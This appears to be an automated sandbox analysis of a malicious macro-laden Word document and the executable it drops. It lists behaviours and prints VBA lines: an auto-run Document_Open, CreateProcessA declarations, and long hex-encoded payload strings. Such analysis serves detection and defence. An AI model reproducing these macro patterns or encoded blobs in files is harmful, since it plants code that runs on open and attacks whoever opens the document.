Source: wxkh.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Creates files inside the system directoryShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.new
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\user\AppData\Roaming\wxkh.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Document contains embedded VBA macrosShow sources
Source: BjgOdvod7.docOLE indicator, VBA macros: true
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile read: C:\Windows\System32\drivers\etc\hosts
.NET source code contains very large array initializationsShow sources
Source: wxkh.exe.4.dr, ?/??.csLarge array initialization: ?: array initializer size 3752
Source: wxkh.exe.4.dr, ?/?.csLarge array initialization: ?: array initializer size 4584
Source: wxkh.exe.4.dr, ?/??.csLarge array initialization: ?: array initializer size 5664
Source: wxkh.exe.4.dr, ?/??.csLarge array initialization: ?: array initializer size 7992
Source: wxkh.exe.4.dr, ?/?.csLarge array initialization: ?: array initializer size 10860
Source: wxkh.exe.4.dr, ?/?.csLarge array initialization: ?: array initializer size 18348
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: BjgOdvod7.docOLE, VBA macro line: Public Sub Document_Open()
Source: BjgOdvod7.docOLE, VBA macro line: Sub Workbook_Open()
Source: BjgOdvod7.docOLE, VBA macro line: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_OpenName: Workbook_Open
Document contains an embedded VBA macro which may execute processesShow sources
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As Any, AG_GNJ As Any, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Any, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As LongPtr
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As QYT_HES, AG_GNJ As QYT_HES, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Long, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As Long
Source: BjgOdvod7.docOLE, VBA macro line: X6 = CreateProcessA(0&, Y_K, AH_MH, CC_B, False, F_AL, 0&, 0&, YZZ_SRB, CQ_C)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As Any, AG_GNJ As Any, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Any, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As LongPtr
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As QYT_HES, AG_GNJ As QYT_HES, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Long, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As Long
Document contains an embedded VBA with hexadecimal encoded stringsShow sources
Source: BjgOdvod7.docStream path 'Macros/VBA/ThisDocument' : found hex strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C87254C764C39124C4C564C106F34307D5A4C8A4C745B6C4C844C4C681037884C4C4C4C4C8B674C4C2B6F4C4C884C4C1B4C464C4C4C5F4C4431624D534C4C4C8743844C6F2F4C4C3D764C4C4C3B4C2359424C154C5C4C4C4C2F4C3B4C283A6E4C314C194C7723494C404C2B4C163F4C4C1D4C4C8B4C4C4C0D4C5F5A8373361661164C4C4C6D4688284C4C1D2
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 54C4C4C1871833E4C4C484C4C2379273B4C434C4C4C4C4233514C73104C4C4C4C4C3B4C754E1F4C4C714C4C0F4C4C4C2C5A424C0D4C26064C4C834C4C4C6F4C563C4A6161314C4C4E743158354C534C4C244C144C78184C874C1139BE79424C4C4C4C4C4C444C8A4C5E4C885A624C4C60584C4E6D4C562D364C4C794C4C4C4C893B13864C2D5D4C124C5C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C6B2E717A414C7374237F884C4C634C4C83144C5A4C192E1D4C283645234C103E4C3B6A4C4C4C705F4C4C4C71622D4C454C261D5C6559314C4C584A4C684C4C4C88334C69891A4C7B4C8A6F4C374C164C4C304C2D4C3E4C464C14896E4C4C4C19424C3C7C464C4C326F4C4C4C194C41478A4C4C4C4C4C4C304C1384594CDE634C4F4C4C772F4C594C4C1F844
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String C4B4C3A578563624C4C474C22484C4C224C4C4A785D4C4C4C68114C4C536E4C4C4C4C2C4C57470D3457694C614C10234C4C4C4C184C4C154C862A5F704C4C4C4C774C4C3A4C644C0F7835484C4C89800E4C494C4C4C4C1D844C323A4C844C4C234C4A4C4C68344C8388824C4C4C5D4C80293D4C4C4C4C763F6F274C4C1D4C4C434C4C444C214C874C0F4C344C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C21118A5F272C4C4C4155364C4C4C4C727677804C4C4C4C4C4C4B2C4C4C174C4C4C304C7B7F4C434C4F1B4C683A4C4C4C3C4C1D158B284C4C3F6253794C852B4C4325264C4C4C4C4C664C4C4C4C72224C5A4C87474C4C27492A794C484C4C4C32224C0F4C414C5C4C4C824C4C4C4C4C13794C4C244C4C394C4C4C614C4C4C4C29744C4C702B784C8B4C284C7
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 64C714C4C4C4C2B4C76441F4C77814C4C2C164C4C4B3E4C5B79544C4C557A702F36824C4C4C4C4C6A4C5C4C4C4C4C4C4C4C4C4C4C64404C2D4C4C4C32864C7F5458806261474C1F444E4C4C224C834C22524C4C825B4C4F565A724C454C6D4427794C383B645D4C4C225E4C174C1B3C1C413E4C4C4C873E4C4C4C552F4C4C4C4C4C394C894C4C79234C4C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C72644C355C3B8A2B803D4C4C4C6F4C4C4C654C411D4C504C3553816F554C4C4C164C4C6E4C7A5F4A4C4C4C564D164C4C20702E4C4C4C211B0D16764C387F4C4C4C644C4C8A4C400D4C3E4C124C254C42672A28864C4C604C704C702D4C354C764C3C4C58854C4C694C784C2E114C4C484C244C4C374C4C104C4C207F4C7682764C364C4C4C867E2A3F7E834
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String C6C474C4C1D374C7F3E3E4C664C1D2456444C804C4C2F4C5319413060194C5A4C4A34674C3B4C7C4C4C4C684C7B4C4C75664C4C4C10154C24174C4C4C135D72724C4C294C34276988404C6E4C884F4C4C454C4C41704F4C5C4C464C4C4C218281364C3E4C4C164C3A2C5D784C1C4C57633A4C297B4C72804F4C194C4C66214C6E1426154C8B404C4C14504C86
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C4D4C4C376F6F4C144C4C4C4C3A4C2E4C4C188B4C73148C4F4C4C6D6C4C4C2E4C4C4C4C4C173B4C7C4C6787634C4C5E4C4C4C4045804C6E45874C4C4C0F4C5F4C4C4C33774C3F4C671C58194C36864C6A4C4C4C4C1B3B6F4C806B4C4C7A4C144C184C4C4C76234C4C705B614C5E404C63514C4C4C4C4C153E4C7B206A4C5C114C827A0E844C674C2C174C4C1
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String A4C2F384C4C35344C4C4C684C4C4C4C874C4C4C5D4C4C4C4C4C70874C4C11254C554C50784C86358A4C881E534C424C1F4C4C4C4C4C53724C4C824C4C58644C4C701B721B4C544C4C4C6D4C4C543B4C473128434A58624C4C884C0D3C4C4C4C4C4C4C4C4C184C0D4C2B8C4C4C1C4C3349784C244C4C704C67254C3D4C4C4C6935124C72853861587C374C7C29
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C4C57168B451C4C4C323F4C1C4C4C114C4C2E4C484C171E4C4C4D5E4C566A4C78834C7A4C34876E4C4B4C7E4C75864C534C7E774C4C4C46554C4C4C4C4C68854C4C70604C4C6A774C88374C4C684C4C4C4C794C4C4C844C4C844C2422154C2C4C373F1A23566F834C156C3D4C731D4C4C121A4C4C8C4C4C4C4C1F4C444C4B4C4C724C6C4C584C634C4C6D4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String C5B4C4832864C884C24884C897E734C701B4C4C4C4B4C304C4C4C4C4C4C4C2C4C4C5C4C724C4C4C34884C134C6E4C4C4C4C124C4C4C874C254C4C1B4C55264C4C4C4C4C424C4C201C3C24664C294C674C593C4C584127794C4C0D4C4C4C6E5480674C204C74324C8B864C2E2E4C4C6F46674C4C4C0E497D4C4C4C4C206766464C864C5F4C4C4C4C164C204C4C584C4C88884C83857E2B59684C4C574C302C55364C5F4C4C834C244C4C4C764C4C8A164C834C4C644C0D44415E734C574C104C764C7E5E4C114C4C4C4C4C4C4C8A4C6474514E4C276E801D4C4C2E4C4C4C614C4C4C4C4C4C4C824C8C4C4C614C744C4C7E84344C644C724C434C814C4C4C474C4C4C4C4C775F
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 12494C7C4C344C4C4C7A4C234C334C594C4C2279334C264C57541A4A4C4C7D6B4C4C4C494C764C4C4C4B4C4C591B4C832D4C4C4C2226634C6B4C4C554C4C666B2F5B4C667D38514C6B4C4C836F4C4C4C3159712C4C4C4C14174C2E124C2E4C3A4C364C4C2A4C4C4C4C4C4688814C4C0D304C4C4C4C4C4C4C5E72482F4C4C2B564C4C4B4C1421394C6B4C774C1B187E12696A4C45584C3E404C585E4C4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C866938301F7F7C294C4C524C4C166C4C643C4C4C6F391E4C551A69494C4C287E4C181A744C4C4C4C4D4C614C774C344C194C2E4C2C63243C264C4C71204C4C4C377B4C4C5F6479434C444E4C4C2B2F4C4C3C4C455E4C4C4C5A613C4C4C6C904C4C4C364C4C4C4C3E4C2270644C81408B4C4C1E144C2A561781162513244C4C4C5263334C14875B4C14764C4C4C5F4C4C284C4C4C4C4C4C2B1A4C7B4C26
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 3F40811F4C5A784C4C434C454C4C864C45174C4C3F454C8B54514C4C4C4C4C4C435F28804C4C4C6681854C5F4C374C4C2B4C424C2A810D4865331234304C744C5A4C8A7F6B88164C874C564C54744C2A4C4C4C4C1E4C4C5E4C284C4C76434C1E1B114C5A534C4C6C8838534C4C4C364C4C4649384C2D8B6C4C261E786C4C45704C7D444C444C274C614C184C384C4C1A494C4C4C4C4C394C5074825B1D4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C4C4C4C857783834C2C4C4C31224C414C82576A2F30704C4C8C174C4C70504C793B4C4C38694C4C4C4B4C4C24421C4C0D104C4C87654C2C4C6C4C4C2188334C664C714C4C574C4C69484C694C4C4C6D4C2E4C4C4C3F4C164F4C46246A807C4C854D4C234C594C4C4C4553794C6F4C4C0F454C4C4C244C267482514C4C4C4C787E4C574C4C3A224C4C3E4C7E6E5E67474C4E4C4C4C323A3F4C405E4C144C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C3F4C4C896A700F6E4C25396E4C824C204C3C114C4C4C5D32844C4C4C4C4C4C4A7E4C854C4C4C4C797EEE4C4C2C6C8B102D5D61114C644C4C33751F30554C5B10814C293F391E4C334C4C6E4C4C4C4C70834C4C2A894C8B24234C844C563516604C7B4C4F594C1B4C3A4C4C4C1D4C3A4C4C4C75416D4C4C4C4C27224C584C444C654C384C612D3715856D4C4C324C1347704C4C4C4C4C4C4C834C3E4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C4D4C5A114C4C4C4C464C4C6C4C4C4C4C4C22214C2A704C4C4C4C4C66204C894C544C2C524C2D4C844C4C4C74286D254C4C843E4C294C7D4C2B4C1C274C634C4C1E4C254C4C6183364C5D6A4C318B4C784C894C674C4C6D874F334C1E4C86403C0E634C555320382F4C728C4C1F364C41874C6E4C4C5F324C4C644C4C69716530293A4C4C4C59314C5E874C4C6A4C742639E42F2466494C3D4C4C824C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 631A69874C8338563B4C4C864C4C594C4C6B4C4C43194C4C104C0E4C42214C4C56860E5C4C4C0D87754C4C4C4C4C4C4C4C4C4C4E3A4C4C5D4C4C7F4C5580614C4C4C7632584C794C6B2A714C4C4C3B1418712442307D4C4C4C4C4C4C3D7F3F4C51884C4C4C795E124C1C4C1C31454C4C4C774C4C692B4C734A4C4C4C134C4C4C7C665D4C3C814C1F1E4C204C854C763A4C4C4C4C5B4C334C4C4C4C4C4C6
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String B4C304C4C3F4C4C4C4C57884C4C4C1A257A42204C4C4C4C4082717C4C4C691F4C614C4C0F404C1A8A5B4C5B4C4C4C4C554C804C4C4C4C7733763A81454C4C507D334C7F3F4C284C2C4C4C334C814C4C2055574E4C4C154C4A4C1A724C16232783834C4C4F4C4C641B74632F4C4C4C4C566D4C524C4C4C2B4C414C4C1A237E7B4C404C4C4C494C4C4C734C4C4C4C684C4C4C334C4C4C4C4C4C4C0D5E4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C304B4C4C2C49794C4C4C8415847A574C4C740F731C4C4C4C554C224C144C574C4C4C4C253E4C4C364C2244834C4C4C2721324C624C4C4C2F714C344C4C4C864C254C4C6E4C4C4C654A804C8B304C0D3E3D4C324C634C6C4C4C244C4C4C574C4C4C0D4C464C817779253212174C4C4C4C7D0E2B6122893E4C0F4C4C4C4C464C4C3C0D434C61454C6F4C3E4C624C244C4C254C387689104C1A441A4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C706C4C567A4C4C4C864C4C4C0D4C4C4C4C2D564C251A6421383E364C534C4C4C2B4C36184C4C4C4C4C524C4C164C214C864C5A4C544C4C6567704C4C735C4C4C4C3B4C16373E8A4C264C572F6F21414C5A8B644C78253E444C424C4C374C3B4C534C7D4C824C4C3A4C781B440D4C4C4C4C64744C4C704C4C4C54264C4C69734C4C4C576A4C4C4C69824C304C4C4C6B4C634C894C4C4C6F4C4C4C4C4C30
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 1C4C504B4C48484C8C4C4C544C4C4C274C4C4C894C4C564C4C4C4C3914334C5E4C884C594C307660FF4C4C4C4C4C4C384C4C4C4C854C608389854C284C4C4A46434C4C4C4C42334C1E4C6E4C635E3E4C234C4C4C434C5A3E4C3E4C2B63564C4C4C6B6C7B4C5E4C6F744C4C33346D441F4C3489814C6C4C7C4C674C0D4C25424C754C224C4C326B79734C174C4C6C18712F3B374C4C4C4C484C4C6F813B4C6E7C4C4C4C4C2D6E64224C4C4C4C314C4C4A4C134C864C4C234C4C4C4C4411624C4C504C1C504C4C216E124C534C5E8B9A4C4C674C524C4C4C4C264C4C4C6F4C4C4C4C4C4C423B84244C494C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C4C4C253D4C661A4C2F7D21596E194C4E4C67393E844313574C4C7E354C4C4C4C1E544C4E4C384C484C1726561060814C77744C864C374C4C4C4C7F43825C4C654C58217A4C514C4C4C3E4C4C2A4C4C4C831B814C2373702B4C27263F4C4C4A4C414C634C4C654C5E3C6B27548A2A1E4C744C4C4C354C5B5E364C6B334C4C5
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 6308C4C48894329206D4C14554C2E4C155F21492C526018614C4C3B204C164C744C674C3C4C503D4C4C544E4C74843C3A4C181E5E4C104C80284C4C4C4C794C444C4C4C6B4C4C186E6F194C4C4B41630E834C4C8C4C4C4C37201B808C4C4C4C704C4C4C754C4C6A4D533F4CF641644C674C4C1B4C4940976A4C4C8B3E734D4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C3F4C4C4C454C654C4C4C324C6762894C844C394C4C4C4C304C4F4C137A4C4C4C3D8C7B4C814C4C4C734C304C4C5E4D4C4C4C4C4C4C8A4C42424B4C234C344C67587C15444C4C254C68614C0D4C654C6C3A4C303039690E7C5E4C804C4C4C4C4C4C4C4C444C164C4C4C84361B428C4C574C4C19106D3A4C7B4C4C85822B0D4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C756D404C4C344C4C834C3F4C4C6E294C4C4C28214C4C4C614C804C4C4C458A4C4C4C4C59384C4C22764C4C4C164C444C4C7B4C114C2D4C18594C4C1E4B17451E614C54806F304C4C454C74664C4C744C4C5D1B214F8B4C4C7A2D4C144F645C4C4C4C4E884C524C57674C4C4C727C2D4C464C4C304C4C4C4C134F4C4C4C4C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 7E4C4C074C4C4C4C4C4C4C6F2B6E4C35784C4C4B4F734C4C4C512D4C4C407C4C2F45752C30324C2C4C214C674C534C4C4C3C794C614C694C4C4C4C4C0F4C4C4C864C4C43155568602C4C5F4888354C654C404C4C4C5D4C4C51684C4C354C264C7455133C4C894C1D3D424C174C6C4C4C4C4C4C624C15354C4C4C4C4C4C4C40456
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 0204C4C36474C4C4C4C284C4C4C4C0E4A374C4C4C6C2D6C7F1A4C4C574C4A4C4C62584C4C654C244C425B194C4C4C4C3E4C644C8882644C4C4C4C394C4C792A4C394C4C4C4C724C754C384C1E204C4C454C4C527D2D694C4C4C114C4C244C4C3D3B4C4C5B52426C7F714C564C4C4C233D4C334C4C4C7A194C4C0F4C6D504C654C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C4C4C314C19511F794C614C7E4C4C4C4C654C4C564C4F454C3C4C5F4C4C4C534C184C754C126D762A1C4C7F4C3E4C4C2B4C30365E325E67324C874C2E4C3D4C4C4C6A7C29606D4C4C3F4C4C6A6D4C7C81474C2A524C4F1A4C6E4C4C7B504C274C4C4C471E0E414C584C8B2B4C5326434C724C4C4C286E8C4C8716567060834
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C724C6A80134C4C74305111274C4C4C4C3D4D6E4C2B4C4C4F554F5C274C604C4C614C614C4C164C4C554C2A874C774C4C77534C114C6E4C4CE54C6959654C3947864C754C4C334C854C344C14784C4CE26D1A634C87614C0D397E354C4C4C395A4C414C314C7D2C4C4C4447264C654C4C4C4C4C4C4C6A4C4C4C4C4C6D4C734C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 73624C4C4C4C6B5E4F264C244C807D4C514C55844C424C704C4C784C4C4C4C4C3C4C4C704C4C144C84194C87404C4C4E4C4C6F4C2B4F4C3E73485D5A4C4C4C744C4C564C194C4C4C5F0D3F85803C4C364C4C3C4C4C4C734C4C774C814C66171F654C724C104C514C4F694C4C18854C652C1C4C4C534C5B821D442B4C4C5C4C7A6
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String D4C4C4C4CFD634C4C4C4C154C4C21294C574C871F4C6E4C4C4C6C4C4C574C414C4C4C687C391A8B5F4C4C144C394C4C4C4C4C4C4C4C4C4C4C4C384C2870828B70754C424C697A4C4C4C344C544C4C3A414C724C7C4C224C764C4C4C4C714C124C73464C4C4C853E694C344C1B4C4C4C324C4C1C4C5F4C4C4D4C4C0E2B4C454E4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 364C504C404A443E1C4F1B4C534C277A724C4C4C217B4C7D4C4C4F674C4C4C57587E4C4C4C2F4C4C2E4C4C3F58514C4C697C584C224C4C4C2C534C4C7831604C424C4D504C5040326E4C3F4B7E4C597F214C8C4C4C69404C1C0F5C4C4C4C437B227C4C4C32264933752E4C4C4C4C4C77634C4C01851A68894E4C5C4C4B2B4C4C6
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 8464C4C4C824F4C25476F3887604C335D6B0D6F4C6D4C4C554C4C654C4C4C4C4C5F70264C742D4C4C4B4C3C0E4C3E35624C2B4C314C504C534C4C0F62644C784C0E5B1A4C4C4C4C4C4C4C254C4C334C79114C344C642C39232E4C4C4C534C4C4C584C4C284C4C4B4C71434C4C794C4C4C614C602851234C3B4C4C6A364C8B4C10
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 61694C504C4C28636B492E4C4A4C4C4C4C6A4C4C414F4C4711204C4C4C4C254E4C8C4C2B444C4C4C4C4C4C5F4C52512E4A304C344C4C644C15824C4C754C5F4C4E27714C4B69274C674C264C1E4C6066544C8A4C50264C4C76653C5C32362C4C5D6D1E804C7E4C4C15464C0E824C4C542E73764C694C5B342D81764C394C823E4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C66554C4C4C854C4C4C17594C874C4C4C3B4C4C5B704C1F4C6079154C4C4A54732884104C4E4C294C4C504C344C4C4F524C4C7E594C4C4C5C184C4C534C4C6C3F4C5B4C4C383E4C4C4C1A397F554C7B4C1A3727314C734C4C4C714C544C384C4C4C4C4C4C4C5227604C4C6C4C4C4C874C454C8447494688434C714C4C4C4C4C23
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 844C354C4C4C7C4C2862564F726972812B6D5E7688864C4C5A4C4C4C4C4C4C4C4C104C1C4C84764C6D4C2F737B5C19498584764C4C843F114C554C4C524C4C858A66814C124C4C4C4C284C5D4C4C264C4C5E566D4714874C4C2D3B1427612A4C4C214C63434C4C4C4C4C4C524C3B294C4C484C254F5F4C4C774C4C624C0D51402
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 14C124C4C6F8C4C8761334C4C624C4C1F697A264C4C4C4C8B4C4C324C4C3E4C36821F574C834C4C386B4C214C4C50714C38624C644F4C274C4C2C4C3C530E5A313A4C57306A744C4C4C4C4C174C594C5A7B654C824C4C4C39634C4C4C694C4C2A4C277C4C4C4C50854C694C7A4C4C4C834C4C4C5F7B3E1D4F4C4C33204C5F4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C772B4C4A788C4C4C1F5E4C4C860D4A4C4C0D4C4C5A4C4C2972233F4C4C4C264C654C4C4C233C4C4C6A865B5E754C4C4C114C4C3F525B264C8151264C4C4C1C2D2C4C424C761E4C2A4C3D4C4C4C4C5B184C484C4C4C4C6A414C4C224C22294C763A3F4C4C814C4C42214C3A4C4C4C1A4C4C4C204C7E4A0D474C4C4C144C49444C4C4C4C604C4C4C424C85554C4C4C4C15836A4C624C4C4C4C4C4C4C4C624C644C6C4C824C4C4C4C4C4C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 3E724C5371214C5B62524C4C4C4D4C454C844C3E4C4C294C4C4C4C4C2B1F774C4C1C4C4C4C4C603B4C6A4C4C124C4C4C4C526A416C34364C63148922344C6A1D5B4C4C444C4C0F4C38434C124C4C4C4C49327B4C4C4C4C2C4C4C4C264C4C4C4C77711B5A4C3B4C4C3E4C4C4C4C5E684A664C4C444C4C4C4C4C4C21164C4C474C4C404C553D7B4C1A4C4C4C274C4C624D644C4C4C135D204C7F254C4C268B40556772504C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 1F194C4C8C4C1D124C712D7D4C1D36594C6B2C4C4C244C4C4C2C6A504C395B4C4C514C4C284C4C104C4C8689524C2F2C1B4C4C824C4A4C254C884C4C23454C567A4C623D164C294C467066724C5F48314C6476584C144C4C384C475D1D4C894C4C4C6C4C4C4C4C486512114C4C4C4C35844C714C76714C724C121A7B4C4C4C4C4C674C3A4C0F124C4C2A1F4C7F2D4C4A74554C4C3C4C4C345D4C184C39414C504C61487F30
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 704C714C694C774C57813E764C4C384C4C6D73754C674C4C4C4C3C4C540F4C324C4C804C7D4C4C4C6D4C4C4C474C244C4C4C184C4C4C4C4C4C8B4C480E0F7F485171304C4C0D4C4C4C4C674C3B4C1D254C4C334C764C484C4C4C4C6A314C8B4C4C8B174C4C4B1C4C4C5D4C4C4C4C2F114D595E4C8C4C4C3E4C3736434C43774C4C524C4C4A464C67334C4C4C0D234C6C4C294C3F4C634C4C4E604C204C4C27662C1B4C4C1D
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 0F1F4C4C654B274C3E4C7A4C8A4C6B441883706C4C574C804C4C894C4C142A4C275C314C4C4C802E154C2916814C2E204C494C6B254C1B194C4C4C385D4C5C4C4C734C4C4C854C274C4C4E4C634C4D4C4C4C7C4C28570F4C8A25502722544C366336401A30823A2C894C2C5C4C294C31554C4C7C7A4C704C3A4C424C114C4C244C3A6E404C174C5C7186374C846D6F2C4C464C5A4C4C5E4C4C4C546C4C4C34647B4C4C4C22
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C4C4C2D156B6D4C2F4C79224C4C674C6B4C4C4C204C4D724C4C0F68154C4C694C4C4C764C4C4C544C73874C4C104C4C1D4C154C384C4C884C6A62274C244C6A4E4C4C4C7F4C4C555A4C4C18424C4C1B38613C4C2D4C4C717E4C594C6C294C4C7D79584C724C8B4C63374C83354C2E4C74714C114A884C79844C4C6D4C4C814C194C4E4C1B744C405B4C7B4C7F4C4C4C374C4C4C104C404C724C59181B2B4C754C62767073
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 824C0D4C4C4C4C1A3E4C894C4C431E4C4C4C1E4C5D5389274C313D4C134C2A4C694C4C4C4C1E5C524C4C414C4C4F2A4C4C7E4C4C644C223C624C4C4C13404C4C79684C444C4C564C1D7A1F4C567D14554C116E464C4C4C4C1D2B4C4C4C4C0D4C4C4C4C744C7E5B7F4C4C4C297D4C4C4C481D7E3C894C4C4C4C4C4C184C4C1F37714C524C6A304C4C4C4C7621804C444C81774C4B404C4C784C4C4C42231753454C50674C5A
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 854C10250F4C4C884C5F4C25334E4C3D4C6A824C4C4C133A4C4C6B4C484C4C384C29654C3D4C4C4C4C144C4C2A4C4C67144E4C4C3F4C4C4C4C4C404C4C486A6763164C470D4C854C4D4C2E7D40834C8041801B534C7C4C3768634C4C7D4C454C4C4C4C2D148279554C2070234C1A794C69184C5C204C211C4C814C4C4C4C454C4C4C5F394C4C4C4C697D214C564615204C4C4C0D594C1D6F0D4C602F4F4C4C1B6B8C4C164C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C22364A4C4C4C384C4C214C5B144C4C4C4E4C4C164C88264C434C4C2C174C1049834C1B3423834C0D74733B284C144C4C0E4C214C784C30194C4E4D4C6C424C1F4C4C4C386035154F224C894C4C494C2A4F4C424C17354C285F414C2F4C4C4C6F89834C594E4C4C4C4C354C454C284C110E4C7C794C854C4C4C4C4C2B4C4C6D4C263739724C4C154C4C4C4C434C4C2D4C524C4C104C334C4CEF1B4C4C4553834C7F4C7F4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C704C874C2C4C254C4C134C28724833484B4C4D4C724C576D647822522F4C2689354C59144C4C2E26154C4C294C484C446D4C4C4C4C7D3D4F4C0F697324254C4C495B4C4C44444C4C5987694C474C4C884C314C4C388966164C364C624C4C2E8B4C4C3954365F4C2F4C4C4C4C4C354C884C4C29131E4C514C4C1A484C4C4C4C874C4C4C5C4C724C81874C4C6F4C37654C44744C12844C264C6F3D514C3323795B394C2447
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C4C302E794C4C594C4C534C4C24702F4C8151604C744E414C225B702643424C1F2A616C504C4C4C4C4C354C4C6E4C1B4C564C4C4C4C73364C4C635041404C5A724C4C4C104C4C4C6C65144B6E57396A4D4C4C8A615B4C374C61394F4C624C4C4C4C4C574C774C4C3A796B4C414C744C0F4C704C4C1E4C1A4C474C4C4C4C4C7A4C4C79764C0D724C344C664D4C4C4C554C50434C4C801C4C814C1A507D4C4C58724C4C194C
